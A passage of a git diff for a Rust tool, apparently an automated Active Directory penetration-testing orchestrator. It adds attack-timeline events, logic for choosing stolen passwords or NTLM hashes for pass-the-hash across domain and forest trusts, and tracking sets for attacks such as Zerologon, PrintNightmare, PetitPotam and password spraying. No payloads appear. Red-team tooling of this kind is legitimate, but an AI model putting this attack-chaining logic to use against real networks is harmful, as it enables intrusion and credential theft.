+++ b/ares-cli/src/orchestrator/result_processing/timeline.rs
@@ -115,10 +115,140 @@ pub(crate) async fn create_hash_timeline_event(
         .await;
 }
 
+/// Emit a timeline event when a credential is upgraded to admin (Pwn3d! detected).
+pub(crate) async fn create_admin_upgrade_timeline_event(
+    dispatcher: &Arc,
+    username: &str,
+    domain: &str,
+) {
+    let techniques = vec!["T1078".to_string()]; // Valid Accounts
+    let event_id = format!(
+        "evt-admin-{}",
+        &uuid::Uuid::new_v4().simple().to_string()[..8]
+    );
+    let event = serde_json::json!({
+        "id": event_id,
+        "timestamp": chrono::Utc::now().to_rfc3339(),
+        "source": "admin_upgrade",
+        "description": format!("Admin access confirmed: {domain}\\{username} (Pwn3d!)"),
+        "mitre_techniques": techniques,
+    });
+    let _ = dispatcher
+        .state
+        .persist_timeline_event(&dispatcher.queue, &event, &techniques)
+        .await;
+}
+
+/// Emit a timeline event when a vulnerability is exploited.
+pub(crate) async fn create_exploitation_timeline_event(
+    dispatcher: &Arc,
+    vuln_id: &str,
+    task_id: &str,
+) {
+    let techniques = exploitation_techniques(vuln_id);
+    let event_id = format!(
+        "evt-exploit-{}",
+        &uuid::Uuid::new_v4().simple().to_string()[..8]
+    );
+    let event = serde_json::json!({
+        "id": event_id,
+        "timestamp": chrono::Utc::now().to_rfc3339(),
+        "source": "exploitation",
+        "description": format!("Vulnerability exploited: {vuln_id} (task {task_id})"),
+        "mitre_techniques": techniques,
+    });
+    let _ = dispatcher
+        .state
+        .persist_timeline_event(&dispatcher.queue, &event, &techniques)
+        .await;
+}
+
+/// Emit a timeline event for lateral movement via S4U/delegation.
+pub(crate) async fn create_lateral_movement_timeline_event(
+    dispatcher: &Arc,
+    target: &str,
+    _ticket_path: &str,
+) {
+    let techniques = vec![
+        "T1550.003".to_string(), // Use Alternate Authentication Material: Pass the Ticket
+        "T1021".to_string(),     // Remote Services
+    ];
+    let event_id = format!(
+        "evt-lateral-{}",
+        &uuid::Uuid::new_v4().simple().to_string()[..8]
+    );
+    let event = serde_json::json!({
+        "id": event_id,
+        "timestamp": chrono::Utc::now().to_rfc3339(),
+        "source": "s4u_lateral_movement",
+        "description": format!("Lateral movement via S4U delegation to {target}"),
+        "mitre_techniques": techniques,
+    });
+    let _ = dispatcher
+        .state
+        .persist_timeline_event(&dispatcher.queue, &event, &techniques)
+        .await;
+}
+
+/// Emit a timeline event when Domain Admin is achieved.
+pub(crate) async fn create_domain_admin_timeline_event(
+    dispatcher: &Arc,
+    domain: &str,
+    path: Option<&str>,
+) {
+    let techniques = vec![
+        "T1003.006".to_string(), // OS Credential Dumping: DCSync
+        "T1078.002".to_string(), // Valid Accounts: Domain Accounts
+    ];
+    let event_id = format!("evt-da-{}", &uuid::Uuid::new_v4().simple().to_string()[..8]);
+    let description = match path {
+        Some(p) => format!("CRITICAL: Domain Admin achieved for {domain} via {p}"),
+        None => format!("CRITICAL: Domain Admin achieved for {domain}"),
+    };
+    let event = serde_json::json!({
+        "id": event_id,
+        "timestamp": chrono::Utc::now().to_rfc3339(),
+        "source": "domain_admin",
+        "description": description,
+        "mitre_techniques": techniques,
+    });
+    let _ = dispatcher
+        .state
+        .persist_timeline_event(&dispatcher.queue, &event, &techniques)
+        .await;
+}
+
+/// Map vulnerability IDs to MITRE ATT&CK technique IDs.
+fn exploitation_techniques(vuln_id: &str) -> Vec<String> {
+    let vuln_lower = vuln_id.to_lowercase();
+    let mut techniques = vec!["T1210".to_string()]; // Exploitation of Remote Services (base)
+    if vuln_lower.contains("constrained_delegation") {
+        techniques.push("T1558.003".to_string()); // Kerberoasting (S4U)
+    }
+    if vuln_lower.contains("unconstrained_delegation") {
+        techniques.push("T1558".to_string()); // Steal or Forge Kerberos Tickets
+    }
+    if vuln_lower.contains("mssql") {
+        techniques.push("T1505".to_string()); // Server Software Component
+    }
+    if vuln_lower.contains("esc1") || vuln_lower.contains("esc4") || vuln_lower.contains("esc8") {
+        techniques.push("T1649".to_string()); // Steal or Forge Authentication Certificates
+    }
+    if vuln_lower.contains("rbcd") {
+        techniques.push("T1134.001".to_string()); // Access Token Manipulation: Token Impersonation
+    }
+    if vuln_lower.contains("smb_signing") {
+        techniques.push("T1557.001".to_string()); // LLMNR/NBT-NS Poisoning (relay)
+    }
+    techniques
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
 
+    // --- credential_techniques ---
+
     #[test]
     fn credential_techniques_admin() {
         let t = credential_techniques("nxc-smb", true);
@@ -170,6 +300,8 @@ mod tests {
         assert!(t.contains(&"T1558.003".to_string()));
     }
 
+    // --- hash_techniques ---
+
     #[test]
     fn hash_techniques_base() {
         let t = hash_techniques("aabbccdd", "ntlm", "manual");
@@ -236,6 +368,8 @@ mod tests {
         assert!(!t.contains(&"T1003.006".to_string()));
     }
 
+    // --- is_critical_hash ---
+
     #[test]
     fn critical_hash_krbtgt() {
         assert!(is_critical_hash("krbtgt"));
@@ -250,4 +384,54 @@ mod tests {
     fn critical_hash_regular_user() {
         assert!(!is_critical_hash("jsmith"));
     }
+
+    // --- exploitation_techniques ---
+
+    #[test]
+    fn exploitation_techniques_base() {
+        let t = exploitation_techniques("some_vuln");
+        assert!(t.contains(&"T1210".to_string()));
+    }
+
+    #[test]
+    fn exploitation_techniques_constrained_delegation() {
+        let t = exploitation_techniques("constrained_delegation_dc01");
+        assert!(t.contains(&"T1558.003".to_string()));
+    }
+
+    #[test]
+    fn exploitation_techniques_mssql() {
+        let t = exploitation_techniques("mssql_impersonation_sql01");
+        assert!(t.contains(&"T1505".to_string()));
+    }
+
+    #[test]
+    fn exploitation_techniques_esc1() {
+        let t = exploitation_techniques("esc1_template");
+        assert!(t.contains(&"T1649".to_string()));
+    }
+
+    #[test]
+    fn exploitation_techniques_esc4() {
+        let t = exploitation_techniques("esc4_template");
+        assert!(t.contains(&"T1649".to_string()));
+    }
+
+    #[test]
+    fn exploitation_techniques_rbcd() {
+        let t = exploitation_techniques("rbcd_dc01");
+        assert!(t.contains(&"T1134.001".to_string()));
+    }
+
+    #[test]
+    fn exploitation_techniques_smb_signing() {
+        let t = exploitation_techniques("smb_signing_disabled_192.168.58.10");
+        assert!(t.contains(&"T1557.001".to_string()));
+    }
+
+    #[test]
+    fn exploitation_techniques_unconstrained() {
+        let t = exploitation_techniques("unconstrained_delegation_ws01");
+        assert!(t.contains(&"T1558".to_string()));
+    }
 }
diff --git a/ares-cli/src/orchestrator/routing.rs b/ares-cli/src/orchestrator/routing.rs
index 7f450c3c..ca110f90 100644
--- a/ares-cli/src/orchestrator/routing.rs
+++ b/ares-cli/src/orchestrator/routing.rs
@@ -81,7 +81,6 @@ impl ActiveTaskTracker {
     }
 
     /// Total active tasks across all roles.
-    #[cfg(test)]
     pub async fn total(&self) -> usize {
         let inner = self.inner.lock().await;
         inner.tasks.len()
diff --git a/ares-cli/src/orchestrator/state/dedup.rs b/ares-cli/src/orchestrator/state/dedup.rs
index bf3cd920..6d9605f6 100644
--- a/ares-cli/src/orchestrator/state/dedup.rs
+++ b/ares-cli/src/orchestrator/state/dedup.rs
@@ -60,6 +60,30 @@ impl SharedState {
         Ok(())
     }
 
+    /// Remove a dedup set entry from Redis (used to allow retries after a
+    /// transient failure such as auth-mismatch on enumeration).
+    pub async fn unpersist_dedup(
+        &self,
+        queue: &TaskQueueCore,
+        set_name: &str,
+        key: &str,
+    ) -> Result<()> {
+        let operation_id = {
+            let state = self.inner.read().await;
+            state.operation_id.clone()
+        };
+        let redis_key = format!(
+            "{}:{}:{}:{}",
+            state::KEY_PREFIX,
+            operation_id,
+            state::KEY_DEDUP_PREFIX,
+            set_name
+        );
+        let mut conn = queue.connection();
+        let _: () = conn.srem(&redis_key, key).await?;
+        Ok(())
+    }
+
     /// Persist MSSQL enum dispatched entry to Redis.
     pub async fn persist_mssql_dispatched(
         &self,
@@ -81,6 +105,29 @@ impl SharedState {
         let _: () = conn.expire(&redis_key, 86400).await?;
         Ok(())
     }
+
+    /// Remove an MSSQL enum dispatched entry from Redis so the next
+    /// `auto_mssql_detection` tick can re-publish a vuln for that host.
+    #[allow(dead_code)]
+    pub async fn unpersist_mssql_dispatched(
+        &self,
+        queue: &TaskQueueCore,
+        ip: &str,
+    ) -> Result<()> {
+        let operation_id = {
+            let state = self.inner.read().await;
+            state.operation_id.clone()
+        };
+        let redis_key = format!(
+            "{}:{}:{}",
+            state::KEY_PREFIX,
+            operation_id,
+            state::KEY_MSSQL_ENUM_DISPATCHED
+        );
+        let mut conn = queue.connection();
+        let _: () = conn.srem(&redis_key, ip).await?;
+        Ok(())
+    }
 }
 
 #[cfg(test)]
diff --git a/ares-cli/src/orchestrator/state/inner.rs b/ares-cli/src/orchestrator/state/inner.rs
index 552c0aec..43ca86d5 100644
--- a/ares-cli/src/orchestrator/state/inner.rs
+++ b/ares-cli/src/orchestrator/state/inner.rs
@@ -71,10 +71,14 @@ pub struct StateInner {
     // Completion flag (set externally to signal operation should wrap up)
     pub completed: bool,
+
+    /// Timestamp when all forests were first detected as dominated.
+    /// Used by the completion monitor to enforce a post-exploitation grace period.
+    pub all_forests_dominated_at: Option,
 }
 
 impl StateInner {
-    pub(super) fn new(operation_id: String) -> Self {
+    pub(crate) fn new(operation_id: String) -> Self {
         let mut dedup = HashMap::new();
         for name in ALL_DEDUP_SETS {
             dedup.insert(name.to_string(), HashSet::new());
@@ -109,6 +113,7 @@ impl StateInner {
             completed_tasks: HashMap::new(),
             quarantined_credentials: HashMap::new(),
             completed: false,
+            all_forests_dominated_at: None,
         }
     }
 
@@ -149,6 +154,287 @@ impl StateInner {
         self.quarantined_credentials.insert(key, expiry);
     }
 
+    /// Resolve the DC IP for a domain.
+    ///
+    /// Checks `domain_controllers` first, then falls back to scanning the hosts
+    /// list for a DC whose FQDN suffix matches the domain. This is more robust
+    /// than relying solely on `domain_controllers`, which can have stale or
+    /// missing entries due to startup seed timing issues in multi-domain
+    /// environments.
+    pub fn resolve_dc_ip(&self, domain: &str) -> Option<String> {
+        let domain_lower = domain.to_lowercase();
+        // Tier 1: explicit DC map (case-insensitive)
+        if let Some(ip) = self.domain_controllers.get(&domain_lower).or_else(|| {
+            self.domain_controllers
+                .iter()
+                .find(|(k, _)| k.to_lowercase() == domain_lower)
+                .map(|(_, v)| v)
+        }) {
+            return Some(ip.clone());
+        }
+        // Tier 2: scan hosts for a DC matching this domain by FQDN suffix
+        for host in &self.hosts {
+            if !(host.is_dc || host.detect_dc()) {
+                continue;
+            }
+            if host.hostname.is_empty() {
+                continue;
+            }
+            let parts: Vec<&str> = host.hostname.split('.').collect();
+            if parts.len() >= 3 {
+                let host_domain = parts[1..].join(".").to_lowercase();
+                if host_domain == domain_lower {
+                    return Some(host.ip.clone());
+                }
+            }
+        }
+        None
+    }
+
+    /// Return all unique domains that have a resolvable DC.
+    ///
+    /// Merges domains from `domain_controllers`, `domains`, and `trusted_domains`
+    /// then filters to those where `resolve_dc_ip()` succeeds. Returns
+    /// `(domain, dc_ip)` pairs.
+    pub fn all_domains_with_dcs(&self) -> Vec<(String, String)> {
+        let mut seen = std::collections::HashSet::new();
+        let mut result = Vec::new();
+
+        // Gather all known domain names (lowercased for dedup)
+        let mut all_domains: Vec<String> = Vec::new();
+        for d in self.domain_controllers.keys() {
+            all_domains.push(d.to_lowercase());
+        }
+        for d in &self.domains {
+            all_domains.push(d.to_lowercase());
+        }
+        for d in self.trusted_domains.keys() {
+            all_domains.push(d.to_lowercase());
+        }
+
+        for domain in all_domains {
+            if seen.contains(&domain) {
+                continue;
+            }
+            seen.insert(domain.clone());
+            if let Some(ip) = self.resolve_dc_ip(&domain) {
+                result.push((domain, ip));
+            }
+        }
+
+        result
+    }
+
+    /// Find a cleartext credential from a trusted domain that can authenticate
+    /// to `target_domain` via AD trust (child→parent or cross-forest).
+    ///
+    /// Used as a fallback when no same-domain cleartext credential exists.
+    /// Child-domain creds authenticate to parent DCs via the parent-child trust;
+    /// cross-forest creds authenticate via bidirectional forest trusts.
+    pub fn find_trust_credential(
+        &self,
+        target_domain: &str,
+    ) -> Option<ares_core::models::Credential> {
+        let target = target_domain.to_lowercase();
+
+        // Priority 1: child-domain cred → parent-domain (most reliable)
+        if let Some(c) = self.credentials.iter().find(|c| {
+            !c.password.is_empty()
+                && !self.is_credential_quarantined(&c.username, &c.domain)
+                && c.domain.to_lowercase().ends_with(&format!(".{target}"))
+        }) {
+            return Some(c.clone());
+        }
+
+        // Priority 2: cross-forest trusted domain cred (bidirectional trust)
+        // Check if any credential's domain has a trust with the target domain.
+        // Also falls back to discovered-domain heuristic: if both domains have
+        // known DCs in the same operation, they are likely in a trust relationship.
+        // LDAP bind will simply fail if there is no actual trust.
+        for cred in &self.credentials {
+            if cred.password.is_empty()
+                || self.is_credential_quarantined(&cred.username, &cred.domain)
+            {
+                continue;
+            }
+            let cred_dom = cred.domain.to_lowercase();
+            if cred_dom == target {
+                continue; // same domain, not a trust fallback
+            }
+            let cred_forest = self.forest_root_of(&cred_dom);
+            let target_forest = self.forest_root_of(&target);
+            if cred_forest != target_forest {
+                // Explicit trust relationship known
+                if self.trusted_domains.contains_key(&target_forest)
+                    || self.trusted_domains.contains_key(&cred_forest)
+                {
+                    return Some(cred.clone());
+                }
+                // Heuristic: both forests have DCs in this engagement — likely
+                // trust-related. LDAP bind will fail harmlessly if not.
+                let target_has_dc = self.domain_controllers.keys().any(|d| {
+                    let d = d.to_lowercase();
+                    d == target_forest || self.forest_root_of(&d) == target_forest
+                });
+                let cred_has_dc = self.domain_controllers.keys().any(|d| {
+                    let d = d.to_lowercase();
+                    d == cred_forest || self.forest_root_of(&d) == cred_forest
+                });
+                if target_has_dc && cred_has_dc {
+                    return Some(cred.clone());
+                }
+            }
+        }
+
+        None
+    }
+
+    /// Find a credential for the SOURCE user (the principal performing the
+    /// action), regardless of which TARGET domain the action is aimed at.
+    ///
+    /// Cross-forest ACL/MSSQL/ADCS exploitation has the source user living in
+    /// their own domain (e.g. `petyer.baelish@sevenkingdoms.local`) while a
+    /// vuln's `domain` field points at the target (e.g. `essos.local`).
+    /// Same-domain matching against the target therefore drops legitimate
+    /// cross-forest work.
+    ///
+    /// Selection priority:
+    /// 1. Cred whose domain matches the explicit `@domain` suffix of
+    ///    `source_user`, if present.
+    /// 2. Cred whose domain == `target_domain` (same-domain case).
+    /// 3. Cred from a domain in a trust relationship with `target_domain`
+    ///    (forest sibling, child↔parent, or trusted_domains entry).
+    /// 4. Any non-empty, non-quarantined cred with matching username.
+    pub fn find_source_credential(
+        &self,
+        source_user: &str,
+        target_domain: &str,
+    ) -> Option<ares_core::models::Credential> {
+        let (name, explicit_dom) = parse_principal(source_user);
+        let name_l = name.to_lowercase();
+        let target_l = target_domain.to_lowercase();
+        let target_forest = self.forest_root_of(&target_l);
+
+        let usable = |c: &ares_core::models::Credential| -> bool {
+            !c.password.is_empty()
+                && !self.is_credential_quarantined(&c.username, &c.domain)
+                && c.username.to_lowercase() == name_l
+        };
+
+        if let Some(ref d) = explicit_dom {
+            if let Some(c) = self
+                .credentials
+                .iter()
+                .find(|c| usable(c) && c.domain.to_lowercase() == *d)
+            {
+                return Some(c.clone());
+            }
+        }
+
+        if let Some(c) = self
+            .credentials
+            .iter()
+            .find(|c| usable(c) && c.domain.to_lowercase() == target_l)
+        {
+            return Some(c.clone());
+        }
+
+        if let Some(c) = self.credentials.iter().find(|c| {
+            if !usable(c) {
+                return false;
+            }
+            let dom = c.domain.to_lowercase();
+            if dom == target_l {
+                return false;
+            }
+            let cred_forest = self.forest_root_of(&dom);
+            cred_forest == target_forest
+                || self.trusted_domains.contains_key(&target_forest)
+                || self.trusted_domains.contains_key(&cred_forest)
+        }) {
+            return Some(c.clone());
+        }
+
+        self.credentials.iter().find(|c| usable(c)).cloned()
+    }
+
+    /// NTLM-hash variant of [`find_source_credential`] with the same priority
+    /// order. Restricts to NTLM hashes (the only type usable for PTH).
+    pub fn find_source_hash(
+        &self,
+        source_user: &str,
+        target_domain: &str,
+    ) -> Option<ares_core::models::Hash> {
+        let (name, explicit_dom) = parse_principal(source_user);
+        let name_l = name.to_lowercase();
+        let target_l = target_domain.to_lowercase();
+        let target_forest = self.forest_root_of(&target_l);
+
+        let usable = |h: &ares_core::models::Hash| -> bool {
+            !h.hash_value.is_empty()
+                && h.hash_type.eq_ignore_ascii_case("NTLM")
+                && !self.is_credential_quarantined(&h.username, &h.domain)
+                && h.username.to_lowercase() == name_l
+        };
+
+        if let Some(ref d) = explicit_dom {
+            if let Some(h) = self
+                .hashes
+                .iter()
+                .find(|h| usable(h) && h.domain.to_lowercase() == *d)
+            {
+                return Some(h.clone());
+            }
+        }
+
+        if let Some(h) = self
+            .hashes
+            .iter()
+            .find(|h| usable(h) && h.domain.to_lowercase() == target_l)
+        {
+            return Some(h.clone());
+        }
+
+        if let Some(h) = self.hashes.iter().find(|h| {
+            if !usable(h) {
+                return false;
+            }
+            let dom = h.domain.to_lowercase();
+            if dom == target_l {
+                return false;
+            }
+            let cred_forest = self.forest_root_of(&dom);
+            cred_forest == target_forest
+                || self.trusted_domains.contains_key(&target_forest)
+                || self.trusted_domains.contains_key(&cred_forest)
+        }) {
+            return Some(h.clone());
+        }
+
+        self.hashes.iter().find(|h| usable(h)).cloned()
+    }
+
+    /// Get the forest root for a domain.
+    /// If the domain is a child (e.g. `child.contoso.local`), the forest
+    /// root is the parent (e.g. `contoso.local`). Otherwise returns self.
+    pub fn forest_root_of(&self, domain: &str) -> String {
+        let d = domain.to_lowercase();
+        // Check if this domain is a child of any known domain
+        for known in self.domains.iter() {
+            let k = known.to_lowercase();
+            if d != k && d.ends_with(&format!(".{k}")) {
+                return k;
+            }
+        }
+        for known in self.domain_controllers.keys() {
+            let k = known.to_lowercase();
+            if d != k && d.ends_with(&format!(".{k}")) {
+                return k;
+            }
+        }
+        d
+    }
+
     /// Check if a dedup key exists in the named set.
     pub fn is_processed(&self, set_name: &str, key: &str) -> bool {
         self.dedup
@@ -173,6 +459,34 @@ impl StateInner {
             .insert(key);
     }
 
+    /// Remove a key from the named dedup set so it can be retried.
+    pub fn unmark_processed(&mut self, set_name: &str, key: &str) {
+        if let Some(s) = self.dedup.get_mut(set_name) {
+            s.remove(key);
+        }
+    }
+
+    /// Remove every key in `set_name` that starts with `prefix`. Returns the
+    /// removed keys so the caller can also drop them from the persisted store.
+    /// Used by trust automation to wake cross-forest fallback automations
+    /// (FSP/ACL/group enum) for a target domain when their dedup format is
+    /// `{kind}:{domain}[:tail]` — clearing all entries for a target without
+    /// knowing the full key.
+    pub fn unmark_processed_by_prefix(&mut self, set_name: &str, prefix: &str) -> Vec<String> {
+        let Some(s) = self.dedup.get_mut(set_name) else {
+            return Vec::new();
+        };
+        let to_remove: Vec<String> = s
+            .iter()
+            .filter(|k| k.starts_with(prefix))
+            .cloned()
+            .collect();
+        for k in &to_remove {
+            s.remove(k);
+        }
+        to_remove
+    }
+
     /// Check if all discovered forests have been dominated (krbtgt obtained).
     ///
     /// Returns `true` when `compute_undominated_forests()` returns an empty list,
@@ -194,6 +508,16 @@ impl StateInner {
     }
 }
 
+/// Parse a principal string of form `name` or `name@domain.fqdn`.
+/// Returns `(name, Some(domain_lower))` for the @-form, `(name, None)` for bare names.
+fn parse_principal(s: &str) -> (&str, Option<String>) {
+    if let Some((name, dom)) = s.split_once('@') {
+        (name, Some(dom.to_lowercase()))
+    } else {
+        (s, None)
+    }
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -246,6 +570,29 @@ mod tests {
         assert_eq!(state.dedup[DEDUP_SECRETSDUMP].len(), 1);
     }
 
+    #[test]
+    fn unmark_processed_by_prefix_removes_matching() {
+        let mut state = StateInner::new("op-1".into());
+        state.mark_processed(DEDUP_SECRETSDUMP, "xforest:fabrikam.local:dc01".into());
+        state.mark_processed(DEDUP_SECRETSDUMP, "xforest:fabrikam.local:dc02".into());
+        state.mark_processed(DEDUP_SECRETSDUMP, "xforest:contoso.local:dc01".into());
+        state.mark_processed(DEDUP_SECRETSDUMP, "unrelated:key".into());
+        let removed =
+            state.unmark_processed_by_prefix(DEDUP_SECRETSDUMP, "xforest:fabrikam.local:");
+        assert_eq!(removed.len(), 2);
+        assert!(removed
+            .iter()
+            .all(|k| k.starts_with("xforest:fabrikam.local:")));
+        assert_eq!(state.dedup[DEDUP_SECRETSDUMP].len(), 2);
+    }
+
+    #[test]
+    fn unmark_processed_by_prefix_unknown_set_returns_empty() {
+        let mut state = StateInner::new("op-1".into());
+        let removed = state.unmark_processed_by_prefix("does_not_exist", "x:");
+        assert!(removed.is_empty());
+    }
+
     #[test]
     fn dedup_sets_are_independent() {
         let mut state = StateInner::new("op-1".into());
@@ -331,6 +678,40 @@ mod tests {
         DEDUP_ADCS_EXPLOIT,
         DEDUP_GPO_ABUSE,
         DEDUP_LAPS,
+        DEDUP_NTLM_RELAY,
+        DEDUP_NOPAC,
+        DEDUP_ZEROLOGON,
+        DEDUP_PRINTNIGHTMARE,
+        DEDUP_MSSQL_COERCION,
+        DEDUP_PASSWORD_POLICY,
+        DEDUP_GPP_SYSVOL,
+        DEDUP_NTLMV1_DOWNGRADE,
+        DEDUP_LDAP_SIGNING,
+        DEDUP_WEBDAV_DETECTION,
+        DEDUP_SPOOLER_CHECK,
+        DEDUP_MACHINE_ACCOUNT_QUOTA,
+        DEDUP_DFS_COERCION,
+        DEDUP_PETITPOTAM_UNAUTH,
+        DEDUP_WINRM_LATERAL,
+        DEDUP_GROUP_ENUMERATION,
+        DEDUP_LOCALUSER_SPRAY,
+        DEDUP_KRBRELAYUP,
+        DEDUP_SEARCHCONNECTOR,
+        DEDUP_LSASSY_DUMP,
+        DEDUP_RDP_LATERAL,
+        DEDUP_FOREIGN_GROUP_ENUM,
+        DEDUP_CERTIPY_AUTH,
+        DEDUP_SID_ENUMERATION,
+        DEDUP_DNS_ENUM,
+        DEDUP_DOMAIN_USER_ENUM,
+        DEDUP_PTH_SPRAY,
+        DEDUP_CERTIFRIED,
+        DEDUP_DACL_ABUSE,
+        DEDUP_SMBCLIENT_ENUM,
+        DEDUP_ACL_DISCOVERY,
+        DEDUP_CROSS_FOREST_ENUM,
+        DEDUP_CROSS_REALM_LATERAL,
+        DEDUP_GOLDEN_CERT,
     ];
     assert_eq!(expected.len(), ALL_DEDUP_SETS.len());
     for name in expected {
diff --git a/ares-cli/src/orchestrator/state/mod.rs b/ares-cli/src/orchestrator/state/mod.rs
index 93b8002d..35483899 100644
--- a/ares-cli/src/orchestrator/state/mod.rs
+++ b/ares-cli/src/orchestrator/state/mod.rs
@@ -14,6 +14,7 @@ mod publishing;
 mod shared;
 
 // Re-export everything that was publicly visible from the old single file.
+pub use inner::StateInner;
 pub use shared::SharedState;
 
 pub const DEDUP_CRACK_REQUESTS: &str = "crack_requests";
@@ -41,6 +42,40 @@ pub const DEDUP_SHARE_ENUM: &str = "share_enum";
 pub const DEDUP_ADCS_EXPLOIT: &str = "adcs_exploit";
 pub const DEDUP_GPO_ABUSE: &str = "gpo_abuse";
 pub const DEDUP_LAPS: &str = "laps_extract";
+pub const DEDUP_NTLM_RELAY: &str = "ntlm_relay";
+pub const DEDUP_NOPAC: &str = "nopac";
+pub const DEDUP_ZEROLOGON: &str = "zerologon";
+pub const DEDUP_PRINTNIGHTMARE: &str = "printnightmare";
+pub const DEDUP_MSSQL_COERCION: &str = "mssql_coercion";
+pub const DEDUP_PASSWORD_POLICY: &str = "password_policy";
+pub const DEDUP_GPP_SYSVOL: &str = "gpp_sysvol";
+pub const DEDUP_NTLMV1_DOWNGRADE: &str = "ntlmv1_downgrade";
+pub const DEDUP_LDAP_SIGNING: &str = "ldap_signing";
+pub const DEDUP_WEBDAV_DETECTION: &str = "webdav_detection";
+pub const DEDUP_SPOOLER_CHECK: &str = "spooler_check";
+pub const DEDUP_MACHINE_ACCOUNT_QUOTA: &str = "machine_account_quota";
+pub const DEDUP_DFS_COERCION: &str = "dfs_coercion";
+pub const DEDUP_PETITPOTAM_UNAUTH: &str = "petitpotam_unauth";
+pub const DEDUP_WINRM_LATERAL: &str = "winrm_lateral";
+pub const DEDUP_GROUP_ENUMERATION: &str = "group_enumeration";
+pub const DEDUP_LOCALUSER_SPRAY: &str = "localuser_spray";
+pub const DEDUP_KRBRELAYUP: &str = "krbrelayup";
+pub const DEDUP_SEARCHCONNECTOR: &str = "searchconnector";
+pub const DEDUP_LSASSY_DUMP: &str = "lsassy_dump";
+pub const DEDUP_RDP_LATERAL: &str = "rdp_lateral";
+pub const DEDUP_FOREIGN_GROUP_ENUM: &str = "foreign_group_enum";
+pub const DEDUP_CERTIPY_AUTH: &str = "certipy_auth";
+pub const DEDUP_SID_ENUMERATION: &str = "sid_enumeration";
+pub const DEDUP_DNS_ENUM: &str = "dns_enum";
+pub const DEDUP_DOMAIN_USER_ENUM: &str = "domain_user_enum";
+pub const DEDUP_PTH_SPRAY: &str = "pth_spray";
+pub const DEDUP_CERTIFRIED: &str = "certifried";
+pub const DEDUP_DACL_ABUSE: &str = "dacl_abuse";
+pub const DEDUP_SMBCLIENT_ENUM: &str = "smbclient_enum";
+pub const DEDUP_ACL_DISCOVERY: &str = "acl_discovery";
+pub const DEDUP_CROSS_FOREST_ENUM: &str = "cross_forest_enum";
+pub const DEDUP_CROSS_REALM_LATERAL: &str = "cross_realm_lateral";
+pub const DEDUP_GOLDEN_CERT: &str = "golden_cert";
 
 /// Vuln queue ZSET key suffix.
 pub const KEY_VULN_QUEUE: &str = "vuln_queue";
@@ -74,4 +109,103 @@ const ALL_DEDUP_SETS: &[&str] = &[
     DEDUP_ADCS_EXPLOIT,
     DEDUP_GPO_ABUSE,
     DEDUP_LAPS,
+    DEDUP_NTLM_RELAY,
+    DEDUP_NOPAC,
+    DEDUP_ZEROLOGON,
+    DEDUP_PRINTNIGHTMARE,
+    DEDUP_MSSQL_COERCION,
+    DEDUP_PASSWORD_POLICY,
+    DEDUP_GPP_SYSVOL,
+    DEDUP_NTLMV1_DOWNGRADE,
+    DEDUP_LDAP_SIGNING,
+    DEDUP_WEBDAV_DETECTION,
+    DEDUP_SPOOLER_CHECK,
+    DEDUP_MACHINE_ACCOUNT_QUOTA,
+    DEDUP_DFS_COERCION,
+    DEDUP_PETITPOTAM_UNAUTH,
+    DEDUP_WINRM_LATERAL,
+    DEDUP_GROUP_ENUMERATION,
+    DEDUP_LOCALUSER_SPRAY,
+    DEDUP_KRBRELAYUP,
+    DEDUP_SEARCHCONNECTOR,
+    DEDUP_LSASSY_DUMP,
+    DEDUP_RDP_LATERAL,
+    DEDUP_FOREIGN_GROUP_ENUM,
+    DEDUP_CERTIPY_AUTH,
+    DEDUP_SID_ENUMERATION,
+    DEDUP_DNS_ENUM,
+    DEDUP_DOMAIN_USER_ENUM,
+    DEDUP_PTH_SPRAY,
+    DEDUP_CERTIFRIED,
+    DEDUP_DACL_ABUSE,
+    DEDUP_SMBCLIENT_ENUM,
+    DEDUP_ACL_DISCOVERY,
+    DEDUP_CROSS_FOREST_ENUM,
+    DEDUP_CROSS_REALM_LATERAL,
+    DEDUP_GOLDEN_CERT,
 ];
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn all_dedup_sets_are_unique() {
+        let mut seen = std::collections::HashSet::new();
+        for name in ALL_DEDUP_SETS {
+            assert!(seen.insert(*name), "Duplicate dedup set name: {name}");
+        }
+    }
+
+    #[test]
+    fn new_dedup_constants_in_all_dedup_sets() {
+        let new_constants = [
+            DEDUP_NTLM_RELAY,
+            DEDUP_NOPAC,
+            DEDUP_ZEROLOGON,
+            DEDUP_PRINTNIGHTMARE,
+            DEDUP_MSSQL_COERCION,
+            DEDUP_PASSWORD_POLICY,
+            DEDUP_GPP_SYSVOL,
+            DEDUP_NTLMV1_DOWNGRADE,
+            DEDUP_LDAP_SIGNING,
+            DEDUP_WEBDAV_DETECTION,
+            DEDUP_SPOOLER_CHECK,
+            DEDUP_MACHINE_ACCOUNT_QUOTA,
+            DEDUP_DFS_COERCION,
+            DEDUP_PETITPOTAM_UNAUTH,
+            DEDUP_WINRM_LATERAL,
+            DEDUP_GROUP_ENUMERATION,
+            DEDUP_LOCALUSER_SPRAY,
+            DEDUP_KRBRELAYUP,
+            DEDUP_SEARCHCONNECTOR,
+            DEDUP_LSASSY_DUMP,
+            DEDUP_RDP_LATERAL,
+            DEDUP_FOREIGN_GROUP_ENUM,
+            DEDUP_CERTIPY_AUTH,
+            DEDUP_SID_ENUMERATION,
+            DEDUP_DNS_ENUM,
+            DEDUP_DOMAIN_USER_ENUM,
+            DEDUP_PTH_SPRAY,
+            DEDUP_CERTIFRIED,
+            DEDUP_DACL_ABUSE,
+            DEDUP_SMBCLIENT_ENUM,
+        ];
+        for c in &new_constants {
+            assert!(
+                ALL_DEDUP_SETS.contains(c),
+                "Dedup constant '{c}' missing from ALL_DEDUP_SETS"
+            );
+        }
+    }
+
+    #[test]
+    fn dedup_set_count() {
+        // Ensure we know how many dedup sets exist (catches accidental omissions)
+        assert!(
+            ALL_DEDUP_SETS.len() >= 45,
+            "Expected at least 45 dedup sets, got {}",
+            ALL_DEDUP_SETS.len()
+        );
+    }
+}
diff --git a/ares-cli/src/orchestrator/state/publishing/credentials.rs b/ares-cli/src/orchestrator/state/publishing/credentials.rs
index 5232af9f..ae918e90 100644
--- a/ares-cli/src/orchestrator/state/publishing/credentials.rs
+++ b/ares-cli/src/orchestrator/state/publishing/credentials.rs
@@ -10,15 +10,18 @@ use redis::aio::ConnectionLike;
 
 use crate::orchestrator::state::SharedState;
 use crate::orchestrator::task_queue::TaskQueueCore;
 
-use super::sanitize_credential;
+use super::{sanitize_credential, strip_netexec_artifact};
 
 impl SharedState {
     /// Add a credential to state and Redis (with dedup).
